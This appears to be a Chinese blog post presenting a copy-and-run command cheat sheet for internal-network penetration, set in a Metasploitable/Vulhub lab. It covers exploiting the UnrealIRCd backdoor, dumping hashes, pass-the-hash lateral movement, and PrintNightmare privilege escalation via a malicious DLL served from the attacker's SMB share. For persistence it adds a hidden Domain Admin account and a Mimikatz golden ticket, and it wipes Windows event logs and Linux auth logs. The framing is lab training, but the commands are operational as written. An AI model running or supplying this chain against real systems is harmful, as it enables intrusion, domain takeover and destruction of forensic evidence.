news 2026/4/15 15:27:48

内网渗透靶场实操命令速查表

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
内网渗透靶场实操命令速查表

本速查表基于之前的Vulhub+Metasploitable 2 靶场实操清单,涵盖从外网突破到持久化的全流程命令,可直接复制执行。

环境说明:攻击机 Kali(192.168.56.101)、跳板机 Metasploitable 2(192.168.56.102)、域控制器(192.168.56.103)、域内主机(192.168.56.104

一、 外网突破:获取跳板机权限

1. 端口扫描与漏洞发现

bash

运行

# nmap 全端口版本扫描 nmap -sV -p- 192.168.56.102 # 搜索 UnrealIRCd 漏洞模块(msfconsole 内执行) msfconsole search unrealircd use exploit/unix/irc/unrealircd_3281_backdoor set RHOSTS 192.168.56.102 run

2. 获取 Meterpreter 会话后基础操作

bash

运行

# 查看跳板机系统信息 sysinfo # 切换到系统 shell shell # 后台挂起会话(返回 msfconsole) background

二、 内网信息收集

1. 内网存活主机探测

bash

运行

# Meterpreter 内执行 ping 扫描 run post/multi/gather/ping_sweep RHOSTS=192.168.56.0/24 # 手动 ARP 扫描(Kali 本机执行) arp-scan -l # 扫描当前网段 fping -g 192.168.56.0/24 # 批量 ping 探测

2. 域环境信息枚举

bash

运行

# 检测是否存在域(跳板机 shell 内执行) ipconfig /all # 查看 DNS 后缀 net config workstation # 查询域控制器列表 nltest /dclist:test.com # Impacket 工具查询域用户(Kali 执行) python3 /usr/share/doc/python3-impacket/examples/net.py user /domain -target-ip 192.168.56.103 # BloodHound 可视化域权限(Kali 执行) bloodhound # 启动工具,导入域信息

3. 主机详细信息收集

系统类型核心命令
Windowssysteminfo(系统补丁)netstat -ano(网络连接)tasklist /svc(进程服务)
Linuxuname -a(内核版本)ps -ef(进程)find / -perm -u+s -type f 2>/dev/null(SUID 文件)

三、 横向移动:哈希传递攻击(PTH)

1. 提取目标用户哈希

bash

运行

# Windows 主机哈希提取(Meterpreter 内) run post/windows/gather/hashdump # Linux 主机凭证扫描(跳板机 shell 内) wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh chmod +x linpeas.sh ./linpeas.sh

2. Impacket PTH 横向移动(Kali 执行)

bash

运行

# 格式:psexec.py 域名/用户名@目标IP -hashes LM哈希:NTLM哈希 python3 /usr/share/doc/python3-impacket/examples/psexec.py test.com/user1@192.168.56.104 -hashes aad3b435b51404eeaad3b435b51404ee:1234567890abcdef1234567890abcdef # 若获取明文密码,直接登录 WinRM evil-winrm -i 192.168.56.104 -u user1 -p P@ssw0rd!

四、 权限提升:PrintNightmare 漏洞利用

1. 攻击机准备恶意 DLL 与 SMB 共享

bash

运行

# 下载漏洞利用脚本 git clone https://github.com/cube0x0/CVE-2021-34527.git cd CVE-2021-34527 # 启动 SMB 共享(供靶机下载 DLL) impacket-smbserver share . -smb2support

2. 靶机执行提权命令(Windows 10 主机 shell 内)

cmd

# 挂载攻击机 SMB 共享 net use \\192.168.56.101\share # 执行提权脚本,获取 SYSTEM 权限 CVE-2021-34527.exe \\192.168.56.101\share\malicious.dll

五、 持久化:域内留后门

1. 创建隐藏域管理员账户

cmd

# 在域控制器执行,创建带 $ 隐藏账户 net user hidden_admin P@ssw0rd! /add /domain net group "Domain Admins" hidden_admin /add /domain

2. 生成黄金票据(Mimikatz 执行)

bash

运行

# 提取 KRBTGT 账户哈希 mimikatz.exe "lsadump::lsa /inject /name:krbtgt" exit # 生成黄金票据(替换 SID 和哈希值) mimikatz.exe "kerberos::golden /domain:test.com /sid:S-1-5-21-xxxxxx /krbtgt:哈希值 /user:backdoor /ptt" exit

六、 痕迹清理

1. Windows 日志清理

cmd

# 清空系统、安全、应用日志 wevtutil cl System wevtutil cl Security wevtutil cl Application

2. Linux 日志清理

bash

运行

# 清空 SSH 登录日志和系统日志 echo "" > /var/log/auth.log echo "" > /var/log/syslog # 清空命令历史记录 history -c && history -w

七、 常用工具命令速查

工具用途命令
Impacket 横向移动python3 wmiexec.py test.com/admin@192.168.56.104 -hashes 哈希值
密码哈希破解john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
端口扫描masscan 192.168.56.0/24 -p 135,445,3389 --rate=1000
提权扫描./PrivescCheck.ps1(Windows)./linpeas.sh(Linux)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/10 13:48:07

从零开始做一个最简单的CNN实例

一、CNN基本概念 站内已经有详细的教程 【深度学习】一文搞懂卷积神经网络(CNN)的原理(超详细)_卷积神经网络原理-CSDN博客、 二、完成一个简单实例需要掌握什么 1.张量基本操作 我们将张量基本操作分为 4 个层次 &#xff0…

作者头像 李华
网站建设 2026/4/15 15:08:02

《创业之路》-741-CTO的核心能力是前瞻性和技术预见能力,对未来机会方向的洞察能力

“CTO的核心能力是前瞻性和技术预见能力,是对未来机会方向的洞察能力。”这不仅是对技术领导者的深刻理解,更是对企业能否穿越周期、持续创新的关键判断。下面我们来系统深化这一观点,将其升华为一套 “CTO前瞻性能力模型” ——不仅说明“是…

作者头像 李华
网站建设 2026/4/15 15:04:59

喷砂除锈设备工艺流程是什么?| 广东鑫百通喷砂机厂家

喷砂除锈设备标准工艺流程:五步实现完美基材 喷砂除锈设备工艺远非简单的“用砂子打表面”,而是一套严谨、高效的系统工程。规范的工艺流程是确保处理质量、控制成本与保障安全的核心。 喷砂除锈设备标准流程可精炼为以下5个关键步骤。 第一步&#xff1…

作者头像 李华
网站建设 2026/4/15 15:08:01

创客匠人:从个人IP到知识变现,如何构建可持续的内容生态?

在知识付费与内容创业浪潮中,越来越多的人开始意识到:单纯的内容输出已不足以构建长期竞争力。无论是讲师、咨询师、行业专家,还是创业者,都面临一个共同问题:如何从“被看见”走向“被选择”,并最终实现可…

作者头像 李华
网站建设 2026/4/15 15:05:01

小程序计算机毕设之基于springboot+java的在线学习网站平台系统小程序基于springboot的智能学习小程序(完整前后端代码+说明文档+LW,调试定制等)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华
网站建设 2026/4/13 6:49:23

小程序毕设选题推荐:基于springboot的华兴书城微信小程序线上购书、阅读社交化【附源码、mysql、文档、调试+代码讲解+全bao等】

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

作者头像 李华